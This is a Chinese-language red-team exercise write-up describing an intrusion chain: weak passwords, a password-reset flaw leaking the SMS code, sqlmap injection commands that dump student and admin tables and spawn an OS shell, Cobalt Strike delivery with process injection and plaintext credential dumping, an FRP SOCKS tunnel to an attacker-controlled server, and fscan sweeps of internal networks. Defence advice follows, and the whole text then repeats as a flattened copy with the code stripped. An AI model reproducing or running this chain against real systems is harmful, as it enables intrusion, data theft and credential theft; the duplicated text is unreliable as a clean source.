攻防演练下的实战思路:贰
字数 1164 2025-08-11 22:57:21

攻防演练实战技术:逻辑漏洞与SQL注入利用详解

1. 弱口令漏洞的持续有效性

尽管弱口令漏洞看似简单,但在攻防演练中仍然普遍存在:

  • 伪强口令现象:许多系统使用"好记的强口令"如gtcz@2022(哥谭市财政局),这类口令仍属于弱口令范畴
  • 老资产风险:未登记的老系统中常存在默认口令或简单弱口令
  • 利用方法:配合信息收集和自动化工具可有效发现并利用这些弱口令

2. 逻辑漏洞利用实战案例

2.1 信息收集阶段

  • 使用FOFA搜索引擎:title="哥谭"搜索与目标相关的网络资产
  • 目录扫描发现敏感路径:/logfile暴露了用户名(phtyxx)和手机号

2.2 密码重置漏洞利用

  1. 访问登录界面,选择"忘记密码"功能
  2. 输入从日志中获取的用户名
  3. 在密码重置页面输入泄露的手机号
  4. 使用BurpSuite拦截响应,发现验证码直接包含在响应包中(如194694)
  5. 使用该验证码完成密码修改,最终获取管理员权限

关键点:验证码缺陷+敏感信息泄露的组合漏洞

3. SQL注入漏洞利用全流程

3.1 漏洞发现与验证

  • 使用AWVS扫描发现注入点:http://x.x.x.x:8010/display.asp?vkind=1%27
  • 验证漏洞存在

3.2 数据库信息收集

  1. 查询所有数据库:

    sqlmap -u "http://x.x.x.x:8010/display.asp?vkind=1" --dbs
    
  2. 查看当前用户权限(确认DBA权限):

    sqlmap -u "http://x.x.x.x:8010/display.asp?vkind=1" --current-user
    
  3. 统计数据库记录数(用于评估数据价值):

    sqlmap -u "http://x.x.x:8010/display.asp?vkind=1" -D pdata --count
    
  4. 获取表结构信息:

    sqlmap -u "http://x.x.x.x:8010/display.asp?vkind=1" -D video --tables
    sqlmap -u "http://x.x.x.x:8010/display.asp?vkind=1" -D video -T vadmin --columns
    
  5. 导出敏感数据:

    sqlmap -u "http://x.x.x.x:8010/display.asp?vkind=1" -D pdata -T students --dump
    

3.3 服务器权限获取

  1. 通过xp_cmdshell获取系统权限:

    sqlmap -u "http://x.x.x.x:8010/display.asp?vkind=1" --os-shell
    
  2. 使用PowerShell无文件落地上线Cobalt Strike

  3. 信息收集:

    shell ipconfig /all  # 查看网络配置
    inject 4884 x64      # 进程注入
    logonpasswords       # 获取明文密码
    

3.4 内网渗透准备

建立代理隧道

  1. 配置FRP客户端(frpc.ini):

    [common]
    server_addr = x.x.x.x
    server_port = 7000
    
    [http_proxy]
    type = tcp
    remote_port = 6000
    plugin = socks5
    
  2. 配置FRP服务端(frps.ini):

    [common]
    bind_addr = 0.0.0.0
    bind_port = 7000
    
  3. 启动服务:

    # 服务端
    ./frps -c frps.ini
    
    # 客户端
    shell frpc.exe -c frpc.ini
    

3.5 内网扫描与利用

  1. 使用FSCAN进行内网扫描:

    shell fscan64.exe -h 10.0.0.0/8 -o 10_result.txt
    shell fscan64.exe -h 192.168.0.0/16 -o 192_result.txt
    shell fscan64.exe -h 172.16.0.0/12 -o 172_result.txt
    
  2. 配置SOCKS代理后使用超级弱口令扫描工具扫描内网弱口令

  3. 根据扫描结果验证内网漏洞,完成渗透测试

4. 总结与防御建议

攻击技术总结

  1. 逻辑漏洞利用:验证码缺陷配合信息泄露可绕过认证
  2. SQL注入利用:从注入到提权的完整链条
    • 信息收集 → 数据窃取 → 服务器提权 → 内网渗透

防御建议

  1. 验证码安全

    • 验证码应在服务端校验,不应出现在响应中
    • 验证码应设置有效期且一次性使用
  2. SQL注入防护

    • 使用参数化查询
    • 最小权限原则,避免使用sa账户
    • 禁用xp_cmdshell等危险组件
  3. 内网安全

    • 网络分段隔离
    • 重要系统二次认证
    • 定期漏洞扫描与渗透测试
  4. 日志与监控

    • 敏感操作日志记录
    • 异常行为实时监控
    • 定期审计日志文件权限
  5. 密码策略

    • 强制使用真正的强密码
    • 定期更换密码
    • 多因素认证

通过理解这些攻击技术,安全团队可以更好地构建防御体系,在攻防演练和实际安全防护中取得更好效果。

攻防演练实战技术:逻辑漏洞与SQL注入利用详解 1. 弱口令漏洞的持续有效性 尽管弱口令漏洞看似简单,但在攻防演练中仍然普遍存在: 伪强口令现象 :许多系统使用"好记的强口令"如 gtcz@2022 (哥谭市财政局),这类口令仍属于弱口令范畴 老资产风险 :未登记的老系统中常存在默认口令或简单弱口令 利用方法 :配合信息收集和自动化工具可有效发现并利用这些弱口令 2. 逻辑漏洞利用实战案例 2.1 信息收集阶段 使用FOFA搜索引擎: title="哥谭" 搜索与目标相关的网络资产 目录扫描发现敏感路径: /logfile 暴露了用户名( phtyxx )和手机号 2.2 密码重置漏洞利用 访问登录界面,选择"忘记密码"功能 输入从日志中获取的用户名 在密码重置页面输入泄露的手机号 使用BurpSuite拦截响应,发现验证码直接包含在响应包中(如 194694 ) 使用该验证码完成密码修改,最终获取管理员权限 关键点 :验证码缺陷+敏感信息泄露的组合漏洞 3. SQL注入漏洞利用全流程 3.1 漏洞发现与验证 使用AWVS扫描发现注入点: http://x.x.x.x:8010/display.asp?vkind=1%27 验证漏洞存在 3.2 数据库信息收集 查询所有数据库: 查看当前用户权限(确认DBA权限): 统计数据库记录数(用于评估数据价值): 获取表结构信息: 导出敏感数据: 3.3 服务器权限获取 通过xp_ cmdshell获取系统权限: 使用PowerShell无文件落地上线Cobalt Strike 信息收集: 3.4 内网渗透准备 建立代理隧道 : 配置FRP客户端(frpc.ini): 配置FRP服务端(frps.ini): 启动服务: 3.5 内网扫描与利用 使用FSCAN进行内网扫描: 配置SOCKS代理后使用超级弱口令扫描工具扫描内网弱口令 根据扫描结果验证内网漏洞,完成渗透测试 4. 总结与防御建议 攻击技术总结 逻辑漏洞利用 :验证码缺陷配合信息泄露可绕过认证 SQL注入利用 :从注入到提权的完整链条 信息收集 → 数据窃取 → 服务器提权 → 内网渗透 防御建议 验证码安全 : 验证码应在服务端校验,不应出现在响应中 验证码应设置有效期且一次性使用 SQL注入防护 : 使用参数化查询 最小权限原则,避免使用sa账户 禁用xp_ cmdshell等危险组件 内网安全 : 网络分段隔离 重要系统二次认证 定期漏洞扫描与渗透测试 日志与监控 : 敏感操作日志记录 异常行为实时监控 定期审计日志文件权限 密码策略 : 强制使用真正的强密码 定期更换密码 多因素认证 通过理解这些攻击技术,安全团队可以更好地构建防御体系,在攻防演练和实际安全防护中取得更好效果。